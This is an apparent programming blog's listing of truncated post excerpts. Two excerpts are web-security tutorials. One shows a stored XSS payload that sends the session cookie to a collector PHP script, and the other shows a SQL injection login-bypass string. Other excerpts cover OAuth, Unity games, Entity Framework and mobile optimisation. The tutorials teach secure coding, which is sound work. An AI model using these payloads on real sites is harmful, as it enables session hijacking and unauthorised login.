Code Made Simple

In the second part of this series of articles we will explore a forum-style message page to make a session hijacking attack. First the page code is as follows: Now the problem: the page input is not checked for the existence of potentially dangerous characters, so the page allows the execution of javascript. In addition to small jokes that may be attempted, such as opening popups or redirecting the browser to other pages, the page is vulnerable to another type of attack that allows you to capture the session cookie and send it to another server. Is this the kind of attack we are going to demonstrate here. With the following code inserted in the inputbox for the message we are going to have the browser try to open an image, which is actually a PHP script that will rescue the session cookie: <script>document.write('<img src="http://localhost:8088/login/submitcookie.php?cookie='+escape(document.cookie)+'"/>');</script> The PHP co...

One concern that must be present in all Web developers is the security of their products. In this article we start a series of articles which will explore some basic security issues related to injecting SQL statements into web forms or URL parameters. Examples of code with security issues and how to avoid them are presented. So let's start with a simple login form implemented with the following code: In this example, the code checks to see if more than one database record has been returned, thereby assuming that the credentials provided are correct. The biggest mistake involves concatenating the values ​​received from the form with the SQL statement, thus allowing the user to manipulate the instruction to his or her own pleasure. Regardless of the user name entered, simply type in the password the following text if you choose to indicate that the login has been successfully completed: o' or 1=1 # With this text the SQL statement will always return a rec...

In this post I will demonstrate how to use Google OAuth in a ASPX webform with C#. This project uses Visual Studio 2015 and as a option for the user to sign-up and other to check the sign-in. Let's start by creating a new project.

In this post we will be making a simple and classic game, the Pacman, with Unity 3D. Let's create a new a new project

This post is about entity framework and how to use it to make, almost with a simple mouse click, the CRUD (create, read, update and delete) operations over a table. Let's start by creating a web MVC project with Visual Studio 2015.

 Going mobile is not easy, so you must consider it from the beginning. So I decided to develop a new project for the mobile devices and having a simple structure working I started looking at de frame rate and, surprise surprise, it look bad. I mean it was 6 to 8 frames per second and the scene was almost empty. Then I look at the bag of optimizations and started the kung fu: - first simplify the models, less vertices, less faces, less edges all led to faster rendering; - change the Unity shaders to mobile; - I'm using a terrain so looking at the options I started messing with this:   - pixel error;   - base map distance;   - detail distance; - Theres one directional light in the scene so here's what I changed:   - baking to baked;   - shadows to hard shadows; In the scripts I looked at: - string concatenation - make it with stringbuilder; - function calls, some times can be avoided; - some functions can be optimizaded like the Mathf.Abs ...

New pics of the mobile path for the cars project